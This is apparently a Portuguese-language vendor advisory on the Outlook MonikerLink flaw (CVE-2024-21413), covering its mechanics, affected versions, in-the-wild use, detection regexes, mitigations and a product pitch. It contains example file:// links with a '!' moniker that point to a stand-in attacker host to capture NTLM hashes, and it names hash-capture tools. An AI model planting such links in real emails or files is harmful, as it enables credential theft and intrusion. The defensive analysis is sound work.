CVE-2024-21413: MonikerLink do Microsoft Outlook RCE
Apelidado de “MonikerLink”, CVE-2024-21413 é uma vulnerabilidade crítica do Microsoft Outlook que ignora o Protected View para obter execução remota de código e roubo de credenciais NTLM – simplesmente visualizando um e-mail malicioso. CVSS 9.8 CRÍTICO. Nenhuma interação do usuário além da visualização do email é necessária.
| Atributo | Valor |
|---|---|
| ID do CVE | CVE-2024-21413 |
| Vetor CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-20: Validação de entrada inadequada |
| Publicado | 13 de fevereiro de 2024 |
| Exploração | PoC público – amplamente explorado |
O que é CVE-2024-21413?
CVE-2024-21413 explora a maneira como o Microsoft Outlook lida com hiperlinks contendo o ! (ponto de exclamação) como parte de um URI de identificador de arquivo. Normalmente, o Outlook aplica a "Visualização Protegida" a documentos abertos por e-mail - colocando em sandbox documentos do Office para evitar a execução de código. Esta vulnerabilidade ignora totalmente essa proteção.
Criando um hiperlink no formato file://ATTACKER-SERVER/test.rtf!something, um invasor faz com que o Outlook abra o arquivo RTF sem o Modo de Exibição Protegido e, ao mesmo tempo, aciona uma tentativa automática de autenticação NTLM para o servidor SMB do invasor. O invasor captura o hash NTLMv2 para cracking offline ou ataques de retransmissão.
🚨 Ataque do painel de visualização – não é necessário clicar
Esta vulnerabilidade é desencadeada no painel de visualização do Outlook. A vítima só precisa selecione o e-mail em sua caixa de entrada - sem abertura de anexo, sem necessidade de clicar em link. Em um ambiente corporativo, um único email de phishing enviado para uma lista de distribuição pode comprometer centenas de hashes NTLMv2 simultaneamente.
Produtos afetados
| Produto | Versões afetadas |
|---|---|
| Microsoft Outlook 2016 | Antes da atualização de fevereiro de 2024 |
| Microsoft Outlook 2019 | Antes da atualização de fevereiro de 2024 |
| Microsoft Outlook LTSC 2021 | Antes da atualização de fevereiro de 2024 |
| Aplicativos Microsoft 365 para empresas | Antes da atualização de fevereiro de 2024 |
Não afetado: Outlook na Web (OWA), Outlook para iOS/Android, Outlook para Mac. A vulnerabilidade é específica para clientes desktop do Outlook para Windows.
Mecânica de ataque: a técnica MonikerLink
O COM do Windows (Modelo de Objeto Componente) usa "monikers" para vincular objetos por nome. O file:// O esquema URI no Windows pode incluir um componente de moniker após o ! caractere, que instrui Windows a carregar e ativar o objeto COM referenciado.
# Normal file link — Protected View applied file://attacker.com/share/document.rtf # MonikerLink bypass — ! bypasses Protected View file://attacker.com/share/document.rtf!1337 # When Outlook processes the MonikerLink: # 1. Attempts SMB connection to attacker.com # 2. Sends NTLMv2 authentication (captures hash) # 3. Opens file without Protected View # 4. If file is malicious RTF → RCE
Fluxo de captura de hash NTLM
Mesmo sem um arquivo RTF armado, o ataque de retransmissão NTLM é impactante:
- Vítima visualiza e-mail malicioso no Outlook
- Outlook faz conexão SMB automática com servidor controlado por invasor
- Windows envia resposta de desafio NTLMv2 (hash) para autenticação
- O invasor captura hash com Responder, Impacket ou ferramentas semelhantes
- Hash quebrado offline (senhas fracas em horas) ou retransmitido em tempo real para outros serviços
Exploração no mundo real
Após o lançamento público do PoC, o CVE-2024-21413 foi incorporado aos kits de ferramentas comerciais de phishing em poucos dias. As campanhas observadas incluíram:
- Coleta de credenciais corporativas: E-mails em massa para listas de distribuição corporativa para capturar grandes volumes de hashes NTLM
- Acesso inicial direcionado: Spear phishing contra executivos com e-mails personalizados contendo cargas úteis do MonikerLink
- Cadeias de movimentação lateral: Retransmissão NTLM de hashes capturados para serviços internos (SMB, LDAP, HTTP)
- Comprometimento de e-mail comercial: Coleta de credenciais permitindo acesso à caixa de correio para fraude BEC
Detecção
Regras do gateway de e-mail
# Regex pattern for MonikerLink in email body/attachments # Detect file:// links containing ! character \bfile:\/\/[^\s"']+![^\s"']* # Block external UNC/file links entirely (recommended) \bfile:\/\/[^\s"']+ \\\\[a-z0-9.-]+\\
Detecção de rede
- Conexões SMB de estações de trabalho endpoint para endereços IP externos (nunca devem ocorrer)
- Tentativas de autenticação NTLMv2 para IPs de destino inesperados
- Consultas DNS para domínios controlados por invasores de clientes de e-mail
Detecção de endpoint
- OUTLOOK.EXE iniciando conexões TCP/445 de saída
- Processo do Office gerando processos filhos após visualização do email
- Acesso LSASS de processos do Office
Mitigação
- Aplique os patches de fevereiro de 2024: A Atualização de Segurança da Microsoft para Outlook aborda o desvio do Modo de Exibição Protegido
- Bloquear saída SMB no perímetro: As regras de firewall que bloqueiam a saída TCP/445 e TCP/139 impedem a captura de hash NTLM mesmo se a vulnerabilidade for acionada
- Ative as proteções de relé NTLM: Configure a assinatura SMB e a assinatura LDAP para evitar ataques de retransmissão
- Implante o gateway de segurança de e-mail: Bloquear e-mails contendo
file://e\\(caminho UNC) links no corpo e anexos - Desative o NTLM sempre que possível: As organizações que usam Kerberos podem desabilitar o NTLM para eliminar o caminho de ataque de captura de hash
💡 Defesa em profundidade: Mesmo que você tenha corrigido o Outlook, bloquear SMB de saída no firewall é uma prática recomendada que evita toda essa classe de ataques. Muitas organizações permitem SMB de saída por motivos de compartilhamento de arquivos legados – audite e restrinja isso imediatamente.
Capacidade de detecção KENSAI
- Inventário de versão do cliente de e-mail: KENSAI identifica versões do Outlook em sua organização, sinalizando versões sem patch vulneráveis a CVE-2024-21413
- Simulação de phishing: O módulo de avaliação de phishing do KENSAI pode testar a suscetibilidade dos funcionários às iscas do estilo MonikerLink
- Análise de exposição de rede: Identifica firewalls mal configurados que permitem SMB de saída de estações de trabalho
- Conformidade com patches: Monitoramento contínuo dos níveis de patch do Microsoft Office em relação à cobertura CVE conhecida
Seus clientes Outlook estão corrigidos contra o MonikerLink?
KENSAI verifica sua frota de endpoints em busca de versões vulneráveis do Outlook e identifica caminhos de rede que permitiriam a captura de hash NTLM. Obtenha visibilidade em minutos.
Avalie sua superfície de ataque por e-mail →